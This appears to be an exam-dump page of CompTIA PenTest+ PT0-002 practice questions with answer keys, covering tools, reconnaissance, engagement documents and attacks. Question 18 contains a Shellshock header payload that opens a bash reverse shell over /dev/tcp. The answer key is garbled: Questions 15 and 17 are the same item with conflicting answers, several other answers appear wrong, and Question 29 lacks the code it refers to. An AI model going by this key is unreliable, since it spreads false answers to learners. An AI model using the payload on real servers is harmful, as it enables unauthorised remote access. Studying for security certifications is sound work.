Pass with the PT0-002 PDF Question Set: Latest Real PT0-002 Exam Questions [Q15-Q32]


Try the valid PT0-002 test answers and PT0-002 exam PDF questions

Question 15
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

  • A. Nmap
  • B. tcpdump
  • C. Scapy
  • D. hping3

Correct answer: C

Explanation:
https://0xbharath.github.io/art-of-packet-crafting-with-scapy/scapy/creating_packets/index.html

Question 16
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

  • A. To remove a reverse shell from the system
  • B. To remove the tester-created Mimikatz account
  • C. To remove tools from the server
  • D. To remove hash-cracking registry entries

Correct answer: B

Question 17
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

  • A. Nmap
  • B. tcpdump
  • C. Scapy
  • D. hping3

Correct answer: A

Question 18
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • D. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

Correct answer: A

Question 19
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

  • A. Run nmap with the --script vulners option set against the target
  • B. Run nmap with the -sA option set against the target
  • C. Run nmap with the -sV and -p22 options set against the target
  • D. Run nmap with the -o, -p22, and -sC options set against the target

Correct answer: C

Question 20
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

  • A. PLCs will not act upon commands injected over the network.
  • B. Supervisory systems will detect a malicious injection of code/commands.
  • C. Supervisors and controllers are on a separate virtual network by default.
  • D. Controllers will not validate the origin of commands.

Correct answer: D

Question 21
A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company's web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

  • A. Shodan results
  • B. Externally facing open ports
  • C. IP addresses and subdomains
  • D. DNS forward and reverse lookups
  • E. Zone transfers
  • F. Internet search engines

Correct answer: C,E

Question 22
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

  • A. MSA
  • B. SLA
  • C. ROE
  • D. NDA

Correct answer: D

Question 23
A compliance-based penetration test is primarily concerned with:

  • A. obtaining PII from the protected network.
  • B. obtaining specific information from the protected network.
  • C. bypassing protection on edge devices.
  • D. determining the efficacy of a specific set of security standards.

Correct answer: D

Question 24
A consultant is reviewing the following output after reports of intermittent connectivity issues:
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet]
Which of the following is MOST likely to be reported by the consultant?

  • A. An ARP flooding attack is using the broadcast address to perform DDoS.
  • B. A multicast session was initiated using the wrong multicast group.
  • C. A device on the network has poisoned the ARP cache.
  • D. A device on the network has an IP address in the wrong subnet.

Correct answer: B

Question 25
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

  • A. The existence of default passwords
  • B. Susceptibility to DDoS attacks
  • C. Inability to network
  • D. Unsupported operating systems

Correct answer: D

Question 26
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

  • A. Apple
  • B. Android
  • C. Windows
  • D. Linux

Correct answer: C

Question 27
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:
* Connected to 10.2.11.144 (::1) port 80 (#0)
> GET /readmine.html HTTP/1.1
> Host: 10.2.11.144
> User-Agent: curl/7.67.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Date: Tue, 02 Feb 2021 21:46:47 GMT
< Server: Apache/2.4.41 (Debian)
< Content-Length: 317
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WordPress &#8250; ReadMe</title>
<link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" />
</head>
Which of the following tools would be BEST for the penetration tester to use to explore this site further?

  • A. DirBuster
  • B. Burp Suite
  • C. OWASP ZAP
  • D. WPScan

Correct answer: B

Question 28
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity.
Which of the following is the MOST important action to take before starting this type of assessment?

  • A. Determine if the failover environment relies on resources not owned by the client.
  • B. Establish communication and escalation procedures with the client.
  • C. Verify the client has granted network access to the hot site.
  • D. Ensure the client has signed the SOW.

Correct answer: D

Question 29
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

  • A. Burp Suite and DIRB
  • B. Nmap and OWASP ZAP
  • C. Netcat and cURL
  • D. Hydra and crunch

Correct answer: A

Question 30
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

  • A. Tag nesting
  • B. Meta tagging
  • C. RFID tagging
  • D. RFID cloning

Correct answer: B

Question 31
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.
Which of the following best describes the NEXT step in the engagement?

  • A. Attestation of findings and delivery of the report
  • B. Scheduling of follow-up actions and retesting
  • C. Acceptance by the client and sign-off on the final report
  • D. Review of the lessons learned during the engagement

Correct answer: C

Question 32
......
